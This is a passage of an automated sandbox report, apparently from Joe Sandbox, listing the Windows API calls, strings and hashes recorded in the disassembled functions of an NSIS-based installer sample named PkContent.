                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                      • DeleteObject.GDI32(?), ref: 00404A79
                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                      • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                      • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                      • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                      • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                      • ShowWindow.USER32(00000000), ref: 00404F5B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                      • String ID: $ @$M$N
                                                      • API String ID: 1638840714-3479655940
                                                      • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                      • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                      • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                      • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                      • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                      • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                      • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                      • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                      • SetWindowTextW.USER32(?,?), ref: 00404583
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                      • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                      • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                        • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                        • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                        • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                        • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                        • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                        • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                      • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                        • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                      • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                      • String ID: 82D$@%F$@rD$A
                                                      • API String ID: 3347642858-1086125096
                                                      • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                      • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                      • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                      • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                      • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                      • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                      • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                      • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                      • CloseHandle.KERNEL32(?), ref: 004071E6
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                      • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                      • API String ID: 1916479912-1189179171
                                                      • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                      • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                      • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                      • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                      APIs
                                                      • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                      • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                      • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                      • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                      • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                      • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                      • FindClose.KERNEL32(?), ref: 00406E33
                                                      Strings
                                                      • \*.*, xrefs: 00406D03
                                                      • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                      • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                      • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                      • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                      • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                      • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                      • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                      • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                      • API String ID: 2035342205-3294556389
                                                      • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                      • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                      • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                      • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                      APIs
                                                      • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                      • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                        • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                      • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                      • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                      • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                      • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                      • API String ID: 3581403547-784952888
                                                      • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                      • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                      • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                      • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                      APIs
                                                      • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                      Strings
                                                      • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: CreateInstance
                                                      • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                      • API String ID: 542301482-1377821865
                                                      • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                      • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                      • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                      • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: FileFindFirst
                                                      • String ID:
                                                      • API String ID: 1974802433-0
                                                      • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                      • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                      • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                      • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                      APIs
                                                      • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                      • lstrlenW.KERNEL32(?), ref: 004063CC
                                                      • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                        • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                      • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                      • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                      • GlobalFree.KERNEL32(?), ref: 004064DD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                      • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                      • API String ID: 20674999-2124804629
                                                      • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                      • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                      • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                      • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                      APIs
                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                      • GetSysColor.USER32(?), ref: 004041AF
                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                      • lstrlenW.KERNEL32(?), ref: 004041D6
                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                        • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                        • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                        • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                      • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                      • SendMessageW.USER32(00000000), ref: 00404251
                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                      • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                      • SetCursor.USER32(00000000), ref: 004042D2
